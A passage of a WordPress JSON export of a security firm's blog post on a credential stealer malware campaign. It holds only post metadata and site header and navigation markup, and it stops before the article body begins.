{"id":27679,"date":"2026-06-23T09:34:48","date_gmt":"2026-06-23T07:34:48","guid":{"rendered":"https:\/\/cirosec.de\/?p=27679"},"modified":"2026-06-24T12:04:41","modified_gmt":"2026-06-24T10:04:41","slug":"analysis-of-a-credential-stealer-malware-campaign-part-ii","status":"publish","type":"post","link":"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/","title":{"rendered":"Analysis of a credential stealer malware campaign \u2013 Part II"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"27679\" class=\"elementor elementor-27679\" data-elementor-post-type=\"post\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1f276405 elementor-section-full_width elementor-section-content-middle elementor-section-height-default elementor-section-height-default\" data-id=\"1f276405\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-38174ccc\" data-id=\"38174ccc\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7501bf73 elementor-widget elementor-widget-template\" data-id=\"7501bf73\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"template.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-template\">\n\t\t\t\t\t<header data-elementor-type=\"header\" data-elementor-id=\"6422\" class=\"elementor elementor-6422 elementor-941 elementor-941\" data-elementor-post-type=\"elementor_library\">\n\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3c20b09 elementor-section-full_width elementor-section-content-middle elementor-section-height-default elementor-section-height-default\" data-id=\"3c20b09\" data-element_type=\"section\" data-e-type=\"section\" id=\"header--sticky\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;,&quot;sticky&quot;:&quot;top&quot;,&quot;sticky_on&quot;:[&quot;desktop&quot;,&quot;tablet_extra&quot;],&quot;sticky_offset&quot;:0,&quot;sticky_effects_offset&quot;:0,&quot;sticky_anchor_link_offset&quot;:0}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-2c6b6ea\" data-id=\"2c6b6ea\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-920f2b0 elementor-widget elementor-widget-theme-site-logo elementor-widget-image\" data-id=\"920f2b0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"theme-site-logo.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/en\/\">\n\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"626\" height=\"188\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" class=\"attachment-full size-full wp-image-5868 lazyload\" alt=\"\" sizes=\"(max-width: 626px) 100vw, 626px\" data-src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent.png\" data-srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent.png 626w, https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent-300x90.png 300w\">\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-b85d260\" data-id=\"b85d260\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-db0098d elementor-widget__width-auto elementor-hidden-desktop elementor-widget elementor-widget-shortcode\" data-id=\"db0098d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\n<div role=\"navigation\" aria-label=\"Language Switcher\" class=\"wpml-ls-statics-shortcode_actions wpml-ls wpml-ls-legacy-dropdown-click js-wpml-ls-legacy-dropdown-click\">\n\t<ul>\n\n\t\t<li class=\" wpml-ls-item-legacy-dropdown-click\">\n\n\t\t\t\t\t\t\t\t\t<a href=\"#\" hreflang=\"\" lang=\"\" class=\"js-wpml-ls-item-toggle wpml-ls-item-toggle\" aria-current=\"page\" aria-expanded=\"false\" aria-controls=\"wpml-ls-submenu-click-default\" aria-haspopup=\"true\" aria-label=\"Language switcher, click to open then tab to navigate\" tabindex=\"0\" role=\"button\" title=\"\">\n\t\t\t\t<\/a>\n\n\t\t\t<ul id=\"wpml-ls-submenu-click-default\" class=\"js-wpml-ls-sub-menu wpml-ls-sub-menu\">\n\t\t\t\t\n\t\t\t\t\t<li class=\"wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-de wpml-ls-first-item wpml-ls-last-item\">\n\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/\" hreflang=\"de\" lang=\"de\" class=\"wpml-ls-link\" aria-label=\"Switch to German\" title=\"Switch to German\">\n\t\t\t\t\t\t\t                                    <img decoding=\"async\" class=\"wpml-ls-flag lazyload\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" alt=\"German\" loading=\"lazy\" width=\"15\" height=\"9\" data-src=\"https:\/\/cirosec.de\/wp-content\/plugins\/sitepress-multilingual-cms\/res\/flags\/de.svg\"><\/a>\n\t\t\t\t\t<\/li>\n\n\t\t\t\t\t\t\t<\/ul>\n\n\t\t<\/li>\n\n\t<\/ul>\n<\/div>\n<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-65a0be9 elementor-widget__width-initial elementor-widget-tablet__width-initial elementor-nav-menu--dropdown-mobile elementor-nav-menu--stretch elementor-nav-menu__align-start elementor-widget-mobile__width-auto elementor-hidden-tablet elementor-hidden-mobile elementor-hidden-tablet_extra elementor-hidden-mobile_extra elementor-widget-mobile_extra__width-initial elementor-nav-menu__text-align-aside elementor-nav-menu--toggle elementor-nav-menu--burger elementor-widget elementor-widget-nav-menu\" data-id=\"65a0be9\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;full_width&quot;:&quot;stretch&quot;,&quot;layout&quot;:&quot;horizontal&quot;,&quot;submenu_icon&quot;:{&quot;value&quot;:&quot;&lt;i class=\\&quot;fas fa-caret-down\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;\\\/i&gt;&quot;,&quot;library&quot;:&quot;fa-solid&quot;},&quot;toggle&quot;:&quot;burger&quot;}\" data-widget_type=\"nav-menu.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<nav aria-label=\"Menu\" class=\"elementor-nav-menu--main elementor-nav-menu__container elementor-nav-menu--layout-horizontal e--pointer-none\">\n\t\t\t\t<ul id=\"menu-1-65a0be9\" class=\"elementor-nav-menu\"><li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-7077\"><a href=\"https:\/\/cirosec.de\/en\/\" class=\"elementor-item\">cirosec<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-16136\"><a href=\"#\" class=\"elementor-item elementor-item-anchor\">Services<\/a>\n<ul class=\"sub-menu elementor-nav-menu--dropdown\">\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-15941\"><a href=\"https:\/\/cirosec.de\/en\/services\/\" class=\"elementor-sub-item\">Overview<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9131\"><a href=\"https:\/\/cirosec.de\/en\/services\/consulting-concepts-reviews-and-analyses\/\" class=\"elementor-sub-item\">Consulting, Concepts, Reviews and Analyses<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9073\"><a href=\"https:\/\/cirosec.de\/en\/services\/penetration-tests\/\" class=\"elementor-sub-item\">Penetration Tests<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9077\"><a href=\"https:\/\/cirosec.de\/en\/services\/red-team-assessments\/\" class=\"elementor-sub-item\">Red Team Assessments<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9076\"><a href=\"https:\/\/cirosec.de\/en\/services\/incident-response-and-forensics\/\" class=\"elementor-sub-item\">Incident Response and Forensics<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-26842\"><a href=\"https:\/\/cirosec.de\/en\/services\/security-management-and-compliance\/\" class=\"elementor-sub-item\">Sec\u00adurity Manag\u00adement and Comp\u00adliance<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9075\"><a href=\"https:\/\/cirosec.de\/en\/services\/selection-implementation-of-products-and-solutions\/\" class=\"elementor-sub-item\">Implementation of Products and Solutions<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9078\"><a href=\"https:\/\/cirosec.de\/en\/services\/it-security-training-and-awareness\/\" class=\"elementor-sub-item\">Trainings and Awareness<\/a><\/li>\n<\/ul>\n<\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-16137\"><a href=\"#\" class=\"elementor-item elementor-item-anchor\">Trainings<\/a>\n<ul class=\"sub-menu elementor-nav-menu--dropdown\">\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-15940\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/\" class=\"elementor-sub-item\">Overview<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9092\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/malware-and-ransomware-background-detection-protection-and-response\/\" class=\"elementor-sub-item\">Malware and Ransomware \u2013 Background, Detection, Protection and Response<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9095\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/security-in-microsoft-office-365\/\" class=\"elementor-sub-item\">Security in Microsoft Office 365<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9083\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-and-hardening-of-windows-operating-systems\/\" class=\"elementor-sub-item\">Hacking and Hardening of Windows Operating Systems<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9082\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-and-hardening-of-windows-infrastructures\/\" class=\"elementor-sub-item\">Hacking and Hardening of Windows Infrastructures<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9084\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-extreme\/\" class=\"elementor-sub-item\">Hacking Extreme<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9086\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-extreme-web-applications\/\" class=\"elementor-sub-item\">Hacking Extreme Web Applications<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9080\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/crash-course-it-and-information-security\/\" class=\"elementor-sub-item\">Crash Course IT and Information Security<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-13051\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/nis2-information-security-for-chief-executive-officers\/\" class=\"elementor-sub-item\">NIS 2 Training for Management<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9087\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/incident-handling-response\/\" class=\"elementor-sub-item\">Incident Handling &amp; Response<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-26257\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/training-in-immediate-measures\/\" class=\"elementor-sub-item\">Training in Imm\u00adediate Mea\u00adsures<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9094\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/security-in-azure-cloud-environments\/\" class=\"elementor-sub-item\">Security in Azure Cloud Environments<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9089\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/iso-27001-lead-implementer\/\" class=\"elementor-sub-item\">ISO 27001 Lead Implementer<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9088\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/iso-27001-lead-auditor\/\" class=\"elementor-sub-item\">ISO 27001 Lead Auditor<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9081\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/forensics-extreme\/\" class=\"elementor-sub-item\">Forensics Extreme<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9093\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/security-in-aws-cloud-environments\/\" class=\"elementor-sub-item\">Security in AWS Cloud Environments<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9091\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/it-security-for-strategists-and-managers\/\" class=\"elementor-sub-item\">IT Security for Strategists and Managers<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9090\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/it-security-for-developers\/\" class=\"elementor-sub-item\">IT Security for Developers<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9085\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-extreme-buffer-overflows\/\" class=\"elementor-sub-item\">Hacking Extreme Buffer Overflows<\/a><\/li>\n<\/ul>\n<\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9064\"><a href=\"https:\/\/cirosec.de\/en\/about-us\/\" class=\"elementor-item\">About us<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9160\"><a href=\"https:\/\/cirosec.de\/en\/blog\/\" class=\"elementor-item\">Blog<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t<div class=\"elementor-menu-toggle\" role=\"button\" tabindex=\"0\" aria-label=\"Menu Toggle\" aria-expanded=\"false\">\n\t\t\t<i aria-hidden=\"true\" role=\"presentation\" class=\"elementor-menu-toggle__icon--open eicon-menu-bar\"><\/i><i aria-hidden=\"true\" role=\"presentation\" class=\"elementor-menu-toggle__icon--close eicon-close\"><\/i>\t\t<\/div>\n\t\t\t\t\t<nav class=\"elementor-nav-menu--dropdown elementor-nav-menu__container\" aria-hidden=\"true\">\n\t\t\t\t<ul id=\"menu-2-65a0be9\" class=\"elementor-nav-menu\"><li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-7077\"><a href=\"https:\/\/cirosec.de\/en\/\" class=\"elementor-item\" tabindex=\"-1\">cirosec<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-16136\"><a href=\"#\" class=\"elementor-item elementor-item-anchor\" tabindex=\"-1\">Services<\/a>\n<ul class=\"sub-menu elementor-nav-menu--dropdown\">\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-15941\"><a href=\"https:\/\/cirosec.de\/en\/services\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Overview<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9131\"><a href=\"https:\/\/cirosec.de\/en\/services\/consulting-concepts-reviews-and-analyses\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Consulting, Concepts, Reviews and Analyses<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9073\"><a href=\"https:\/\/cirosec.de\/en\/services\/penetration-tests\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Penetration Tests<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9077\"><a href=\"https:\/\/cirosec.de\/en\/services\/red-team-assessments\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Red Team Assessments<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9076\"><a href=\"https:\/\/cirosec.de\/en\/services\/incident-response-and-forensics\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Incident Response and Forensics<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-26842\"><a href=\"https:\/\/cirosec.de\/en\/services\/security-management-and-compliance\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Sec\u00adurity Manag\u00adement and Comp\u00adliance<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9075\"><a href=\"https:\/\/cirosec.de\/en\/services\/selection-implementation-of-products-and-solutions\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Implementation of Products and Solutions<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9078\"><a href=\"https:\/\/cirosec.de\/en\/services\/it-security-training-and-awareness\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Trainings and Awareness<\/a><\/li>\n<\/ul>\n<\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-16137\"><a href=\"#\" class=\"elementor-item elementor-item-anchor\" tabindex=\"-1\">Trainings<\/a>\n<ul class=\"sub-menu elementor-nav-menu--dropdown\">\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-15940\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Overview<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9092\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/malware-and-ransomware-background-detection-protection-and-response\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Malware and Ransomware \u2013 Background, Detection, Protection and Response<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9095\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/security-in-microsoft-office-365\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Security in Microsoft Office 365<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9083\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-and-hardening-of-windows-operating-systems\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Hacking and Hardening of Windows Operating Systems<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9082\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-and-hardening-of-windows-infrastructures\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Hacking and Hardening of Windows Infrastructures<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9084\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-extreme\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Hacking Extreme<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9086\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-extreme-web-applications\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Hacking Extreme Web Applications<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9080\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/crash-course-it-and-information-security\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Crash Course IT and Information Security<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-13051\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/nis2-information-security-for-chief-executive-officers\/\" class=\"elementor-sub-item\" tabindex=\"-1\">NIS 2 Training for Management<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9087\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/incident-handling-response\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Incident Handling &amp; Response<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-26257\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/training-in-immediate-measures\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Training in Imm\u00adediate Mea\u00adsures<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9094\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/security-in-azure-cloud-environments\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Security in Azure Cloud Environments<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9089\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/iso-27001-lead-implementer\/\" class=\"elementor-sub-item\" tabindex=\"-1\">ISO 27001 Lead Implementer<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9088\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/iso-27001-lead-auditor\/\" class=\"elementor-sub-item\" tabindex=\"-1\">ISO 27001 Lead Auditor<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9081\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/forensics-extreme\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Forensics Extreme<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9093\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/security-in-aws-cloud-environments\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Security in AWS Cloud Environments<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9091\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/it-security-for-strategists-and-managers\/\" class=\"elementor-sub-item\" tabindex=\"-1\">IT Security for Strategists and Managers<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9090\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/it-security-for-developers\/\" class=\"elementor-sub-item\" tabindex=\"-1\">IT Security for Developers<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9085\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-extreme-buffer-overflows\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Hacking Extreme Buffer Overflows<\/a><\/li>\n<\/ul>\n<\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9064\"><a href=\"https:\/\/cirosec.de\/en\/about-us\/\" class=\"elementor-item\" tabindex=\"-1\">About us<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9160\"><a href=\"https:\/\/cirosec.de\/en\/blog\/\" class=\"elementor-item\" tabindex=\"-1\">Blog<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-9ee7d03 elementor-widget-mobile__width-auto elementor-hidden-desktop elementor-widget-tablet_extra__width-auto elementor-widget-tablet__width-auto elementor-widget-mobile_extra__width-auto elementor-view-default elementor-widget elementor-widget-icon\" data-id=\"9ee7d03\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"icon.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-icon-wrapper\">\n\t\t\t<a class=\"elementor-icon\" href=\"#elementor-action%3Aaction%3Dpopup%3Aopen%26settings%3DeyJpZCI6MTI1MDcsInRvZ2dsZSI6ZmFsc2V9\">\n\t\t\t<i aria-hidden=\"true\" class=\"fas fa-bars\"><\/i>\t\t\t<\/a>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-9aaaa68 elementor-hidden-tablet elementor-hidden-mobile elementor-hidden-tablet_extra elementor-hidden-mobile_extra\" data-id=\"9aaaa68\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-eb812f4 elementor-widget__width-auto elementor-hidden-tablet elementor-hidden-mobile elementor-widget elementor-widget-shortcode\" data-id=\"eb812f4\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\n<div role=\"navigation\" aria-label=\"Language Switcher\" class=\"wpml-ls-statics-shortcode_actions wpml-ls wpml-ls-legacy-dropdown-click js-wpml-ls-legacy-dropdown-click\">\n\t<ul>\n\n\t\t<li class=\" wpml-ls-item-legacy-dropdown-click\">\n\n\t\t\t\t\t\t\t\t\t<a href=\"#\" hreflang=\"\" lang=\"\" class=\"js-wpml-ls-item-toggle wpml-ls-item-toggle\" aria-current=\"page\" aria-expanded=\"false\" aria-controls=\"wpml-ls-submenu-click-default\" aria-haspopup=\"true\" aria-label=\"Language switcher, click to open then tab to navigate\" tabindex=\"0\" role=\"button\" title=\"\">\n\t\t\t\t<\/a>\n\n\t\t\t<ul id=\"wpml-ls-submenu-click-default\" class=\"js-wpml-ls-sub-menu wpml-ls-sub-menu\">\n\t\t\t\t\n\t\t\t\t\t<li class=\"wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-de wpml-ls-first-item wpml-ls-last-item\">\n\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/\" hreflang=\"de\" lang=\"de\" class=\"wpml-ls-link\" aria-label=\"Switch to German\" title=\"Switch to German\">\n\t\t\t\t\t\t\t                                    <img decoding=\"async\" class=\"wpml-ls-flag lazyload\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" alt=\"German\" loading=\"lazy\" width=\"15\" height=\"9\" data-src=\"https:\/\/cirosec.de\/wp-content\/plugins\/sitepress-multilingual-cms\/res\/flags\/de.svg\"><\/a>\n\t\t\t\t\t<\/li>\n\n\t\t\t\t\t\t\t<\/ul>\n\n\t\t<\/li>\n\n\t<\/ul>\n<\/div>\n<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-d5c65bb elementor-search-form--skin-minimal elementor-widget__width-auto elementor-hidden-tablet elementor-hidden-mobile elementor-widget elementor-widget-search-form\" data-id=\"d5c65bb\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;skin&quot;:&quot;minimal&quot;}\" data-widget_type=\"search-form.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<search role=\"search\">\n\t\t\t<form class=\"elementor-search-form\" action=\"https:\/\/cirosec.de\/en\/\" method=\"get\">\n\t\t\t\t\t\t\t\t\t\t\t\t<div class=\"elementor-search-form__container\">\n\t\t\t\t\t<label class=\"elementor-screen-only\" for=\"elementor-search-form-d5c65bb\">Search<\/label>\n\n\t\t\t\t\t\t\t\t\t\t\t<div class=\"elementor-search-form__icon\">\n\t\t\t\t\t\t\t<i aria-hidden=\"true\" class=\"fas fa-search\"><\/i>\t\t\t\t\t\t\t<span class=\"elementor-screen-only\">Search<\/span>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\n\t\t\t\t\t<input id=\"elementor-search-form-d5c65bb\" placeholder=\"Search...\" class=\"elementor-search-form__input\" type=\"search\" name=\"s\" value=\"\">\n\t\t\t\t\t<input type='hidden' name='lang' value='en' \/>\n\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t<\/form>\n\t\t<\/search>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-071bdb7 elementor-hidden-tablet elementor-hidden-mobile elementor-hidden-tablet_extra elementor-hidden-mobile_extra\" data-id=\"071bdb7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4d21fed elementor-widget elementor-widget-button\" data-id=\"4d21fed\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" 